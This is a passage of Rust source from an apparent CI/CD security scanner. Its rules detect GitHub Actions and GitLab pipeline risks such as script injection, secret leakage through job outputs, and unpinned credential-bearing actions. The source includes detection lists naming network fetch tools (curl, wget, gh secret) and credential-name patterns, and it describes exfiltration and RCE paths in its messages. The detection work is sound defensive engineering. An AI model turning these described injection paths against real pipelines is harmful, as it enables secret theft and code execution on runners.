if !body_writes_api_response_to_env_sink(body) {
continue;
}
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::UntrustedApiResponseToEnvSink,
path: None,
nodes_involved: vec![step.id],
message: format!(
"Step '{}' captures a GitHub API response (gh CLI or api.github.com) into the GHA env gate ($GITHUB_ENV/$GITHUB_OUTPUT/$GITHUB_PATH) under trigger '{trigger}' — attacker-influenced fields (branch name, PR title) can inject environment variables for every subsequent step in the same job",
step.name
),
recommendation: Recommendation::Manual {
action: "Validate the API field with a strict regex before redirecting (e.g. only `[0-9]+` for a PR number), or write only known-numeric fields. Never pipe free-form fields like branch name or PR title directly into $GITHUB_ENV.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
// ── pr_build_pushes_image_with_floating_credentials ────────────
//
// Detect: workflow triggered by a PR-class event uses a container-registry
// login action that is NOT SHA-pinned. The login action receives credentials
// (OIDC token or static registry secret) — a compromise of the action's
// branch lets an attacker exfiltrate them.
fn is_registry_login_action(action: &str) -> bool {
let bare = action.split('@').next().unwrap_or(action);
matches!(
bare,
"docker/login-action"
| "aws-actions/amazon-ecr-login"
| "aws-actions/configure-aws-credentials"
| "azure/docker-login"
| "azure/login"
| "google-github-actions/auth"
| "google-github-actions/setup-gcloud"
) || bare.ends_with("/login-to-gar")
|| bare.ends_with("/dockerhub-login")
|| bare.ends_with("/login-to-ecr")
|| bare.ends_with("/login-to-acr")
}
fn trigger_includes_pull_request(trigger: &str) -> bool {
trigger.split(',').any(|t| {
let t = t.trim();
// Match `pull_request` and `pull_request_target` — both are PR-class.
t == "pull_request" || t == "pull_request_target"
})
}
/// Rule: PR-triggered workflow uses a non-SHA-pinned container-registry login
/// action. Compound vector: floating action holds registry creds + PR-controlled
/// image content reaches a shared registry.
///
/// Severity: High.
pub fn pr_build_pushes_image_with_floating_credentials(graph: &AuthorityGraph) -> Vec<Finding> {
let trigger = match graph.metadata.get(META_TRIGGER) {
Some(t) => t.as_str(),
None => return Vec::new(),
};
if !trigger_includes_pull_request(trigger) {
return Vec::new();
}
let mut findings = Vec::new();
let mut seen = std::collections::HashSet::new();
for image in graph.nodes_of_kind(NodeKind::Image) {
if image.trust_zone == TrustZone::FirstParty {
continue;
}
if image
.metadata
.get(META_CONTAINER)
.map(|v| v == "true")
.unwrap_or(false)
{
continue;
}
if !is_registry_login_action(&image.name) {
continue;
}
if is_sha_pinned(&image.name) {
continue;
}
if !seen.insert(&image.name) {
continue;
}
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::PrBuildPushesImageWithFloatingCredentials,
path: None,
nodes_involved: vec![image.id],
message: format!(
"PR-triggered workflow ('{trigger}') uses unpinned registry-login action '{}' — a compromise of that action's branch exfiltrates registry credentials or OIDC tokens, and any PR-controlled image content then reaches a shared registry",
image.name
),
recommendation: Recommendation::PinAction {
current: image.name.clone(),
pinned: format!(
"{}@<sha256-digest>",
image.name.split('@').next().unwrap_or(&image.name)
),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
pub fn run_all_rules(graph: &AuthorityGraph, max_hops: usize) -> Vec<Finding> {
let mut findings = Vec::new();
// MVP rules
findings.extend(authority_propagation(graph, max_hops));
findings.extend(over_privileged_identity(graph));
findings.extend(unpinned_action(graph));
findings.extend(untrusted_with_authority(graph));
findings.extend(artifact_boundary_crossing(graph));
// Stretch rules
findings.extend(long_lived_credential(graph));
findings.extend(floating_image(graph));
findings.extend(persisted_credential(graph));
findings.extend(trigger_context_mismatch(graph));
findings.extend(cross_workflow_authority_chain(graph));
findings.extend(authority_cycle(graph));
findings.extend(uplift_without_attestation(graph));
findings.extend(self_mutating_pipeline(graph));
findings.extend(checkout_self_pr_exposure(graph));
findings.extend(variable_group_in_pr_job(graph));
findings.extend(self_hosted_pool_pr_hijack(graph));
findings.extend(service_connection_scope_mismatch(graph));
findings.extend(template_extends_unpinned_branch(graph));
findings.extend(template_repo_ref_is_feature_branch(graph));
findings.extend(vm_remote_exec_via_pipeline_secret(graph));
findings.extend(short_lived_sas_in_command_line(graph));
// ADO inline-script secret-leak rules
findings.extend(secret_to_inline_script_env_export(graph));
findings.extend(secret_materialised_to_workspace_file(graph));
findings.extend(keyvault_secret_to_plaintext(graph));
findings.extend(terraform_auto_approve_in_prod(graph));
findings.extend(addspn_with_inline_script(graph));
findings.extend(parameter_interpolation_into_shell(graph));
// GHA red-team-derived rules
findings.extend(runtime_script_fetched_from_floating_url(graph));
findings.extend(pr_trigger_with_floating_action_ref(graph));
findings.extend(untrusted_api_response_to_env_sink(graph));
findings.extend(pr_build_pushes_image_with_floating_credentials(graph));
findings.extend(secret_via_env_gate_to_untrusted_consumer(graph));
// Blue-team positive invariants (negative-space rules — fire on absence
// of expected defenses)
findings.extend(no_workflow_level_permissions_block(graph));
findings.extend(prod_deploy_job_no_environment_gate(graph));
findings.extend(long_lived_secret_without_oidc_recommendation(graph));
findings.extend(pull_request_workflow_inconsistent_fork_check(graph));
findings.extend(gitlab_deploy_job_missing_protected_branch_only(graph));
findings.extend(terraform_output_via_setvariable_shell_expansion(graph));
// GHA council Bucket 1 rules
findings.extend(risky_trigger_with_authority(graph));
findings.extend(sensitive_value_in_job_output(graph));
findings.extend(manual_dispatch_input_to_url_or_command(graph));
// GHA council Bucket 2 rules
findings.extend(secrets_inherit_overscoped_passthrough(graph));
findings.extend(unsafe_pr_artifact_in_workflow_run_consumer(graph));
// GHA council Bucket 3 rules
findings.extend(script_injection_via_untrusted_context(graph));
findings.extend(interactive_debug_action_in_authority_workflow(graph));
findings.extend(pr_specific_cache_key_in_default_branch_consumer(graph));
findings.extend(gh_cli_with_default_token_escalating(graph));
// GitLab council Bucket A rules
findings.extend(ci_job_token_to_external_api(graph));
findings.extend(id_token_audience_overscoped(graph));
findings.extend(untrusted_ci_var_in_shell_interpolation(graph));
// GitLab council Bucket B+C rules
findings.extend(unpinned_include_remote_or_branch_ref(graph));
findings.extend(dind_service_grants_host_authority(graph));
findings.extend(security_job_silently_skipped(graph));
findings.extend(child_pipeline_trigger_inherits_authority(graph));
findings.extend(cache_key_crosses_trust_boundary(graph));
// GitLab red-team Group D rules
findings.extend(pat_embedded_in_git_remote_url(graph));
findings.extend(ci_token_triggers_downstream_with_variable_passthrough(
graph,
));
findings.extend(dotenv_artifact_flows_to_privileged_deployment(graph));
// Blue-team compensating-control suppressions (downgrade or suppress
// existing-rule findings when a control elsewhere in the graph
// neutralises the risk).
apply_compensating_controls(graph, &mut findings);
apply_confidence_cap(graph, &mut findings);
findings.sort_by_key(|f| f.severity);
findings
}
// ── R3: risky_trigger_with_authority ────────────────────
// `issue_comment`, `pull_request_review`, `pull_request_review_comment`, and
// `workflow_run` are high-blast-radius triggers — anyone able to comment on
// an issue (or any contributor whose previous workflow run completed) can
// fire the workflow with secrets in scope. `trigger_context_mismatch` only
// fires on `pull_request_target` / ADO `pr`, so this rule closes the gap.
/// Trigger names that confer the same effective blast radius as
/// `pull_request_target` once they're paired with write permissions or
/// non-`GITHUB_TOKEN` secrets. Order is alphabetical for stable output.
const RISKY_TRIGGERS: &[&str] = &[
"issue_comment",
"pull_request_review",
"pull_request_review_comment",
"workflow_run",
];
/// Returns true if the permissions string declares any GitHub Actions
/// write-grant scope (`*: write`) or `write-all`. Conservatively flags
/// any unscoped `write-all`. The check looks for `: write` substrings so
/// it catches `contents: write`, `pull-requests: write`, `id-token: write`,
/// etc., regardless of how `Permissions::Map` formats the surrounding map.
fn permissions_grant_writes(perm_string: &str) -> bool {
let p = perm_string.to_lowercase();
p.contains("write-all") || p.contains(": write")
}
/// Rule: high-blast-radius trigger (`issue_comment`,
/// `pull_request_review[_comment]`, `workflow_run`) declared alongside
/// write-grant permissions or any non-`GITHUB_TOKEN` secret.
///
/// Detection (deterministic, no path traversal):
/// 1. Read `META_TRIGGERS` (graph metadata) — comma-joined list of every
/// trigger declared under `on:`.
/// 2. Filter for entries in `RISKY_TRIGGERS`.
/// 3. Inspect every Identity node carrying `META_PERMISSIONS` — if any
/// grants `: write` or `write-all`, the workflow holds write authority.
/// 4. Scan all Secret nodes; any whose name is not literally `GITHUB_TOKEN`
/// counts as a non-default secret in scope.
/// 5. Fire one finding per workflow when steps 1–2 match AND (3 OR 4).
///
/// Severity: High. The blast radius matches `pull_request_target` but the
/// trigger surface is broader (anyone with comment access vs. only PR
/// authors), so this rule never downgrades by trigger type.
pub fn risky_trigger_with_authority(graph: &AuthorityGraph) -> Vec<Finding> {
let triggers_meta = match graph.metadata.get(META_TRIGGERS) {
Some(t) => t,
None => return Vec::new(),
};
let risky_present: Vec<&str> = triggers_meta
.split(',')
.map(str::trim)
.filter(|t| RISKY_TRIGGERS.iter().any(|r| r == t))
.collect();
if risky_present.is_empty() {
return Vec::new();
}
// (3) Any Identity node with write permissions?
let mut writes_identities: Vec<NodeId> = Vec::new();
for ident in graph.nodes_of_kind(NodeKind::Identity) {
if let Some(perms) = ident.metadata.get(META_PERMISSIONS) {
if permissions_grant_writes(perms) {
writes_identities.push(ident.id);
}
}
}
// (4) Any non-GITHUB_TOKEN secret in scope?
let non_default_secrets: Vec<NodeId> = graph
.nodes_of_kind(NodeKind::Secret)
.filter(|s| s.name != "GITHUB_TOKEN")
.map(|s| s.id)
.collect();
if writes_identities.is_empty() && non_default_secrets.is_empty() {
return Vec::new();
}
let trigger_label = risky_present.join(", ");
let cause = if !writes_identities.is_empty() && !non_default_secrets.is_empty() {
format!(
"{} write-grant identit{} and {} non-default secret{}",
writes_identities.len(),
if writes_identities.len() == 1 {
"y"
} else {
"ies"
},
non_default_secrets.len(),
if non_default_secrets.len() == 1 {
""
} else {
"s"
},
)
} else if !writes_identities.is_empty() {
format!(
"{} write-grant identit{}",
writes_identities.len(),
if writes_identities.len() == 1 {
"y"
} else {
"ies"
},
)
} else {
format!(
"{} non-default secret{}",
non_default_secrets.len(),
if non_default_secrets.len() == 1 {
""
} else {
"s"
},
)
};
let mut nodes_involved = writes_identities.clone();
nodes_involved.extend(non_default_secrets);
vec![Finding {
severity: Severity::High,
category: FindingCategory::RiskyTriggerWithAuthority,
path: None,
nodes_involved,
message: format!(
"Workflow trigger(s) [{trigger_label}] grant the same blast radius as pull_request_target but slip past trigger_context_mismatch — {cause} are reachable from any commenter / upstream-run author"
),
recommendation: Recommendation::Manual {
action: "Drop write-grant permissions to the minimum the trigger requires (most labelers/triagers only need `pull-requests: write` or `issues: write`), or split the workflow: keep the comment-triggered handler authority-free and gate privileged work behind a separate workflow that an authorized user must dispatch manually.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
}]
}
// ── R4: sensitive_value_in_job_output ───────────────────
// `jobs.<id>.outputs.<name>` is written to the run log (only the heuristic
// mask protects it) and propagates unmasked via `needs.<job>.outputs.*`.
// Sourcing an output from `secrets.*`, an OIDC-bearing step output, or
// giving it a credential-shaped name is a structural leak.
/// Suffixes that mark a job-output name as credential-shaped. Matched
/// case-insensitively against the trailing segment of the output name.
const CREDENTIAL_NAME_SUFFIXES: &[&str] = &[
"_token",
"_secret",
"_key",
"_pem",
"_password",
"_credential",
"_credentials",
"_api_key",
];
/// Returns true if `name` ends with any of `CREDENTIAL_NAME_SUFFIXES`,
/// matched case-insensitively.
fn output_name_is_credential_shaped(name: &str) -> bool {
let lower = name.to_lowercase();
CREDENTIAL_NAME_SUFFIXES.iter().any(|s| lower.ends_with(s))
}
/// Rule: a `jobs.<id>.outputs.<name>` value is sourced from `secrets.*`, an
/// OIDC-bearing step output, or has a credential-shaped name (suffix
/// matches `_token` / `_secret` / `_key` / `_pem` / `_password` /
/// `_credential[s]` / `_api_key`).
///
/// Detection: read `META_JOB_OUTPUTS` (graph metadata) — pipe-delimited
/// records of `<job>\t<name>\t<source>`. For each record, fire a finding
/// when `source != "literal"` OR `name` matches a credential suffix.
///
/// Severity:
/// - **Critical** when `source == "secret"` (raw `secrets.*` value).
/// - **Critical** when `source == "oidc"` (OIDC token leaked via output).
/// - **High** when `source == "step_output"` AND name is credential-shaped.
/// - **High** when `source == "literal"` AND name is credential-shaped
/// (developer is signaling credential intent in the API).
/// - Otherwise no finding.
pub fn sensitive_value_in_job_output(graph: &AuthorityGraph) -> Vec<Finding> {
let raw = match graph.metadata.get(META_JOB_OUTPUTS) {
Some(s) if !s.is_empty() => s,
_ => return Vec::new(),
};
let mut findings = Vec::new();
for record in raw.split('|') {
// Format: "<job>\t<name>\t<source>"
let mut fields = record.splitn(3, '\t');
let job = match fields.next() {
Some(j) if !j.is_empty() => j,
_ => continue,
};
let name = match fields.next() {
Some(n) if !n.is_empty() => n,
_ => continue,
};
let source = fields.next().unwrap_or("literal");
let credential_named = output_name_is_credential_shaped(name);
let (severity, reason) = match source {
"secret" => (
Severity::Critical,
"value reads `secrets.*` directly — exfiltrated to run log and to every downstream `needs.*.outputs.*` consumer",
),
"oidc" => (
Severity::Critical,
"value derives from a step that holds an OIDC identity — the federated token leaks through the output channel",
),
"step_output" if credential_named => (
Severity::High,
"credential-shaped output name backed by a step output — masking is heuristic, downstream consumers see plaintext",
),
"literal" if credential_named => (
Severity::High,
"credential-shaped output name with a literal value — either the value is a hard-coded secret or the contract leaks credentials to downstream jobs",
),
_ => continue,
};
findings.push(Finding {
severity,
category: FindingCategory::SensitiveValueInJobOutput,
path: None,
nodes_involved: Vec::new(),
message: format!(
"Job '{job}' declares output '{name}' — {reason}"
),
recommendation: Recommendation::Manual {
action: "Do not expose secrets, OIDC tokens, or credential-shaped values via `jobs.<id>.outputs.*`. Pass them between steps within a single job using `env:` (which honors masking) or write them to a secure file consumed only by a downstream step. If a downstream job needs to act on a credential, fetch it directly from the secret store inside that job instead of inheriting it through outputs.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
// ── R6: manual_dispatch_input_to_url_or_command ────────
// `workflow_dispatch.inputs.*` is attacker-controlled in any repository
// where collaborators have `Actions: write`. Flowing an input value into
// `curl` / `wget` / `gh api` / a `run:` URL / `actions/checkout` `ref:`
// gives the dispatcher arbitrary code execution against the runner — a
// pivot from "can run a workflow" to "can land arbitrary code on a
// privileged runner".
/// Tokens that indicate command-line consumption of an input value when
/// they appear in the same `run:` body as the input expression. Each token
/// must be matched whole-word so we don't false-positive on `curlier` etc.
const COMMAND_SINKS: &[&str] = &[
"curl",
"wget",
"gh api",
"gh release",
"gh secret",
"gh repo",
"git clone",
"git fetch",
];
/// Returns true if `body` contains a whole-word occurrence of `needle`.
/// "Whole word" = preceded by start-of-string or non-alphanumeric, and
/// followed by end-of-string or non-alphanumeric. Avoids matching
/// `curl` inside `curlier` or `git fetch` inside `git fetcher`.
fn body_contains_command(body: &str, needle: &str) -> bool {
let mut start = 0;
while let Some(rel) = body[start..].find(needle) {
let abs = start + rel;
let before_ok = abs == 0
|| !body
.as_bytes()
.get(abs - 1)
.map(|b| b.is_ascii_alphanumeric() || *b == b'_')
.unwrap_or(false);
let after_idx = abs + needle.len();
let after_ok = after_idx == body.len()
|| !body
.as_bytes()
.get(after_idx)
.map(|b| b.is_ascii_alphanumeric() || *b == b'_')
.unwrap_or(false);
if before_ok && after_ok {
return true;
}
start = abs + needle.len();
}
false
}
/// Returns true if `body` references the dispatch input `name` via either
/// `${{ inputs.<name> }}` or `${{ github.event.inputs.<name> }}`. Tolerates
/// any whitespace inside the `${{ … }}` expression.
fn body_references_input(body: &str, name: &str) -> bool {
// Substring forms — GHA accepts both `inputs.X` and `github.event.inputs.X`.
let needle_a = format!("inputs.{name}");
let needle_b = format!("github.event.inputs.{name}");
body.contains(&needle_a) || body.contains(&needle_b)
}
/// Rule: a `workflow_dispatch.inputs.*` value flows into a command sink
/// (`curl`, `wget`, `gh api`, `git clone`, …) or `actions/checkout`
/// `with.ref:`.
///
/// Detection:
/// 1. Read `META_DISPATCH_INPUTS` — comma-joined list of input names.
/// 2. For every Step node carrying `META_SCRIPT_BODY`, fire a finding when
/// the body references any input name AND contains a whole-word
/// occurrence of any `COMMAND_SINKS` entry.
/// 3. For every Step node carrying `META_CHECKOUT_REF`, fire a finding when
/// the ref expression references any input name (the ref is consumed by
/// `actions/checkout`, which performs `git fetch` / `git checkout`
/// against the supplied ref).
///
/// Severity: High. Dispatch is a privileged operation, but the privileged
/// surface is bounded to whoever holds `Actions: write` on the repo —
/// narrower than `pull_request_target`, broader than a maintainer-only
/// secret.
pub fn manual_dispatch_input_to_url_or_command(graph: &AuthorityGraph) -> Vec<Finding> {
let inputs_meta = match graph.metadata.get(META_DISPATCH_INPUTS) {
Some(s) if !s.is_empty() => s,
_ => return Vec::new(),
};
let inputs: Vec<&str> = inputs_meta
.split(',')
.map(str::trim)
.filter(|s| !s.is_empty())
.collect();
if inputs.is_empty() {
return Vec::new();
}
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
// (a) Script body sink
if let Some(body) = step.metadata.get(META_SCRIPT_BODY) {
let referenced: Vec<&str> = inputs
.iter()
.copied()
.filter(|name| body_references_input(body, name))
.collect();
if !referenced.is_empty() {
let sinks: Vec<&str> = COMMAND_SINKS
.iter()
.copied()
.filter(|s| body_contains_command(body, s))
.collect();
if !sinks.is_empty() {
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::ManualDispatchInputToUrlOrCommand,
path: None,
nodes_involved: vec![step.id],
message: format!(
"Step '{}' interpolates workflow_dispatch input(s) [{}] into command sink(s) [{}] — anyone with Actions:write can pivot the run to attacker-controlled hosts/refs",
step.name,
referenced.join(", "),
sinks.join(", "),
),
recommendation: Recommendation::Manual {
action: "Pass the input through the step's `env:` block (where the runtime quotes it) and reference `\"$INPUT_NAME\"` in the script. For URLs, validate against an allowlist before fetching. Never let a dispatch input land in a `git clone` / `actions/checkout` ref without an explicit allowlist of permitted refs.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
}
}
// (b) actions/checkout ref sink
if let Some(ref_expr) = step.metadata.get(META_CHECKOUT_REF) {
let referenced: Vec<&str> = inputs
.iter()
.copied()
.filter(|name| body_references_input(ref_expr, name))
.collect();
if !referenced.is_empty() {
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::ManualDispatchInputToUrlOrCommand,
path: None,
nodes_involved: vec![step.id],
message: format!(
"Step '{}' uses workflow_dispatch input(s) [{}] as the actions/checkout ref — the dispatcher chooses which commit lands on the privileged runner",
step.name,
referenced.join(", "),
),
recommendation: Recommendation::Manual {
action: "Constrain the dispatch input via a `type: choice` `options:` allowlist of permitted refs/branches, or hard-code the ref and accept a different parameter (e.g. release tag) that maps onto a vetted ref.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
}
}
findings
}
/// Set of trigger names whose runs are influenced by parties outside the
/// repo's write-permission set — anything that can be initiated by opening a
/// PR, commenting on an issue, or reacting to another workflow's outcome.
/// Used by `secrets_inherit_overscoped_passthrough` and
/// `unsafe_pr_artifact_in_workflow_run_consumer` to gate detection.
const RISKY_TRIGGER_NAMES: &[&str] = &[
"pull_request",
"pull_request_target",
"pull_request_review",
"pull_request_review_comment",
"issue_comment",
"workflow_run",
];
/// Returns true if any trigger name in the comma-joined `META_TRIGGERS` list
/// matches a risky trigger.
fn graph_has_risky_trigger(graph: &AuthorityGraph) -> bool {
let Some(triggers) = graph.metadata.get(META_TRIGGERS) else {
return false;
};
triggers
.split(',')
.any(|t| RISKY_TRIGGER_NAMES.contains(&t.trim()))
}
/// Returns the first risky trigger name present on the graph, for messaging.
fn first_risky_trigger(graph: &AuthorityGraph) -> Option<String> {
let triggers = graph.metadata.get(META_TRIGGERS)?;
triggers
.split(',')
.find(|t| RISKY_TRIGGER_NAMES.contains(&t.trim()))
.map(|s| s.trim().to_string())
}
/// Rule: reusable workflow call uses `secrets: inherit` under a risky trigger.
///
/// Fires once per Step node carrying `META_SECRETS_INHERIT = "true"` when the
/// graph's `META_TRIGGERS` set contains at least one attacker-influenced
/// trigger (`pull_request`, `pull_request_target`, `issue_comment`,
/// `workflow_run`, `pull_request_review`, `pull_request_review_comment`).
///
/// `secrets: inherit` forwards the entire caller secret bag to the callee
/// regardless of which secrets the callee actually consumes. Combined with a
/// trigger an external party can fire, every secret in scope is one
/// compromised callee away from exfiltration.
pub fn secrets_inherit_overscoped_passthrough(graph: &AuthorityGraph) -> Vec<Finding> {
if !graph_has_risky_trigger(graph) {
return Vec::new();
}
let trigger = first_risky_trigger(graph).unwrap_or_else(|| "risky".into());
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let inherits = step
.metadata
.get(META_SECRETS_INHERIT)
.map(|v| v == "true")
.unwrap_or(false);
if !inherits {
continue;
}
// Find the reusable workflow target the step delegates to (if any) so
// the message can name the callee.
let target_name = graph
.edges_from(step.id)
.filter(|e| e.kind == EdgeKind::DelegatesTo)
.filter_map(|e| graph.node(e.to))
.find(|n| n.kind == NodeKind::Image)
.map(|n| n.name.clone())
.unwrap_or_else(|| "<unknown>".into());
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::SecretsInheritOverscopedPassthrough,
path: None,
nodes_involved: vec![step.id],
message: format!(
"Job '{}' calls reusable workflow '{}' with `secrets: inherit` while the workflow is triggered by '{}' — every caller secret forwards to the callee regardless of need",
step.name, target_name, trigger
),
recommendation: Recommendation::Manual {
action: "Replace `secrets: inherit` with an explicit `secrets:` mapping listing only the secrets the callee actually consumes. For PR/comment/workflow_run-triggered callers, audit the callee for log exposure of every forwarded secret.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// Rule: `workflow_run`/`pull_request_target` consumer downloads a PR-context
/// artifact AND interprets its content into a privileged sink.
///
/// Requires:
/// 1. Graph trigger is `workflow_run` or `pull_request_target` (the producer
/// ran in PR context, so the artifact is attacker-controlled).
/// 2. At least one Step in a job carries `META_DOWNLOADS_ARTIFACT = "true"`.
/// 3. At least one Step in the *same job* carries
/// `META_INTERPRETS_ARTIFACT = "true"` (post-to-comment, write to
/// `$GITHUB_ENV`, `eval`, `unzip`, `cat`, `jq`, …).
///
/// Differs from `artifact_boundary_crossing`: that rule flags upload→download
/// trust crossings on Artifact nodes; this rule additionally requires the
/// consumer interprets the downloaded content.
pub fn unsafe_pr_artifact_in_workflow_run_consumer(graph: &AuthorityGraph) -> Vec<Finding> {
// Trigger gate: workflow_run consumers and pull_request_target both run
// in upstream-repo context with elevated permissions while the artifact
// (or PR head ref) originates from PR context.
let triggers_ok = {
let single = graph
.metadata
.get(META_TRIGGER)
.map(|s| s == "workflow_run" || s == "pull_request_target")
.unwrap_or(false);
let multi = graph
.metadata
.get(META_TRIGGERS)
.map(|s| {
s.split(',')
.any(|t| t.trim() == "workflow_run" || t.trim() == "pull_request_target")
})
.unwrap_or(false);
single || multi
};
if !triggers_ok {
return Vec::new();
}
// Group steps by job name so we can pair download + interpret within a job.
use std::collections::BTreeMap;
let mut by_job: BTreeMap<String, (Vec<NodeId>, Vec<NodeId>)> = BTreeMap::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let job = step
.metadata
.get(META_JOB_NAME)
.cloned()
.unwrap_or_default();
let entry = by_job.entry(job).or_default();
if step
.metadata
.get(META_DOWNLOADS_ARTIFACT)
.map(|v| v == "true")
.unwrap_or(false)
{
entry.0.push(step.id);
}
if step
.metadata
.get(META_INTERPRETS_ARTIFACT)
.map(|v| v == "true")
.unwrap_or(false)
{
entry.1.push(step.id);
}
}
let mut findings = Vec::new();
for (job, (downloaders, interpreters)) in by_job {
if downloaders.is_empty() || interpreters.is_empty() {
continue;
}
let mut nodes_involved = downloaders.clone();
nodes_involved.extend(interpreters.iter().copied());
let job_label = if job.is_empty() {
"<workflow-level>".to_string()
} else {
job
};
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::UnsafePrArtifactInWorkflowRunConsumer,
path: None,
nodes_involved,
message: format!(
"Job '{}' downloads a PR-context artifact and interprets its content (post-to-comment, $GITHUB_ENV write, eval/unzip/cat/jq) — malicious PRs can write arbitrary content into the artifact while the consumer runs with upstream-repo authority",
job_label
),
recommendation: Recommendation::Manual {
action: "Treat downloaded artifacts as untrusted: validate against a strict schema before parsing, never feed contents into `eval`/`$GITHUB_ENV`/`$GITHUB_OUTPUT`, and post comment bodies through a length-and-character-allowlist filter. Where possible, separate the privileged-sink step into its own job that does not download the artifact.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
// ── GHA security rules from corpus gap analysis ─────────────────────────
//
// Source: MEMORY/WORK/20260425-230443_taudit-gitlab-parser/corpus-results/council-gha-gaps.md
// Rules R1, R5, R9, R10. All four read META_SCRIPT_BODY (R1, R10) or
// step-level metadata stamped by the GHA parser (R5, R9). They gate on
// META_TRIGGERS where a specific trigger surface is required.
/// Returns true if `triggers_csv` (the comma-separated value of META_TRIGGERS
/// stamped by the GHA parser) contains any of `wanted`. Tolerant of
/// whitespace and empty entries.
fn triggers_contain_any(triggers_csv: Option<&String>, wanted: &[&str]) -> bool {
let Some(csv) = triggers_csv else {
return false;
};
csv.split(',')
.map(|s| s.trim())
.any(|t| wanted.contains(&t))
}
/// Substring locations of every `${{ ... }}` expression inside `body`. Returns
/// the inner trimmed expression text plus the byte range so callers can attach
/// surrounding-context heuristics. Doesn't try to handle nested `}}` — none of
/// the patterns we care about contain it.
fn find_template_expressions(body: &str) -> Vec<(String, std::ops::Range<usize>)> {
let mut out = Vec::new();
let mut cursor = 0usize;
while let Some(rel_open) = body[cursor..].find("${{") {
let open = cursor + rel_open;
let inner_start = open + 3;
let Some(rel_close) = body[inner_start..].find("}}") else {
break;
};
let close = inner_start + rel_close;
let expr = body[inner_start..close].trim().to_string();
out.push((expr, open..close + 2));
cursor = close + 2;
}
out
}
/// Patterns that mark an attacker-controllable expression for R1.
/// Order matters only for documentation — detection is OR.
fn is_untrusted_context_expression(expr: &str) -> bool {
// Strip leading/trailing whitespace already done by caller.
// Examples: `github.event.issue.title`, `github.event.pull_request.body`,
// `github.event.comment.body`, `github.event.review.body`,
// `github.head_ref`, `inputs.target_branch`.
if expr.starts_with("github.event.issue.")
|| expr.starts_with("github.event.pull_request.")
|| expr.starts_with("github.event.comment.")
|| expr.starts_with("github.event.review.")
|| expr.starts_with("github.event.discussion.")
|| expr.starts_with("github.event.workflow_run.")
|| expr.starts_with("github.event.inputs.")
{
return true;
}
if expr == "github.head_ref" || expr.starts_with("github.head_ref ") {
return true;
}
// `inputs.X` is attacker-influenced under workflow_dispatch / workflow_run
// / issue_comment-driven inputs. The rule's caller gates on the trigger
// surface, so any `inputs.*` here is suspect.
if let Some(rest) = expr.strip_prefix("inputs.") {
if !rest.is_empty() {
return true;
}
}
false
}
/// Returns true when an expression's value lands in a script sink that
/// matters for R1 — shell text, JS source, or a write to GITHUB_ENV /
/// GITHUB_OUTPUT. Heuristic: the expression is **not** the right-hand side of
/// a YAML `env:` mapping. The parser already separates step-level `env:`
/// mappings into the secret/auth machinery, so any expression appearing inside
/// the script body itself bypasses the env-indirection mitigation by
/// definition.
fn is_script_injection_sink(_body: &str, _range: &std::ops::Range<usize>) -> bool {
// Every occurrence inside META_SCRIPT_BODY qualifies — the body is the
// shell/JS source itself. (Step-level `env:` values are stored on the
// edges, not in the body.) Kept as a function so the doc string spells
// the rationale and future heuristics have a clear hook.
true
}
/// R1 — script injection via untrusted context.
///
/// Severity: Critical. Classic GitHub Actions remote code execution: an
/// expression that an external actor controls (`github.event.issue.title`,
/// `github.head_ref`, `github.event.inputs.*` under `workflow_dispatch`)
/// gets concatenated into the shell command (or JS source for
/// `actions/github-script`) at YAML-render time, before any quoting or
/// escaping the runtime would apply to env-bound values.
pub fn script_injection_via_untrusted_context(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let Some(body) = step.metadata.get(META_SCRIPT_BODY) else {
continue;
};
if body.is_empty() {
continue;
}
let mut hits: Vec<String> = Vec::new();
for (expr, range) in find_template_expressions(body) {
if !is_untrusted_context_expression(&expr) {
continue;
}
if !is_script_injection_sink(body, &range) {
continue;
}
if !hits.contains(&expr) {
hits.push(expr);
}
}
if hits.is_empty() {
continue;
}
// Cap preview to keep the message readable even when a step has many
// distinct attacker-controlled interpolations.
let preview: String = hits
.iter()
.take(3)
.map(|s| format!("${{{{ {s} }}}}"))
.collect::<Vec<_>>()
.join(", ");
let suffix = if hits.len() > 3 {
format!(", and {} more", hits.len() - 3)
} else {
String::new()
};
findings.push(Finding {
severity: Severity::Critical,
category: FindingCategory::ScriptInjectionViaUntrustedContext,
path: None,
nodes_involved: vec![step.id],
message: format!(
"Step '{}' interpolates attacker-controlled expression(s) {preview}{suffix} directly into a script body without an env: indirection — classic GitHub Actions RCE",
step.name
),
recommendation: Recommendation::Manual {
action: "Bind the expression to a step-level `env:` variable and reference it as `\"$VAR\"` (shell) or `process.env.VAR` (JS). The runtime then quotes the value as data instead of YAML-rendering it as code.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// R5 — interactive debug action in an authority workflow.
///
/// Severity: High. A successful tmate / upterm session opens an external SSH
/// endpoint into the runner with the full job environment loaded — every
/// secret in scope, the checked-out HEAD, and write access to whatever the
/// GITHUB_TOKEN holds. Anyone who can flip `debug_enabled=true` at job start
/// (often a maintainer with `workflow_dispatch` permission) can launder the
/// job's authority off the runner.
pub fn interactive_debug_action_in_authority_workflow(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
// Pre-compute whether the workflow holds non-default authority.
// Two ways to qualify:
// (a) any step has access to a non-GITHUB_TOKEN Secret or Identity, OR
// (b) any GITHUB_TOKEN identity has a non-default write permission.
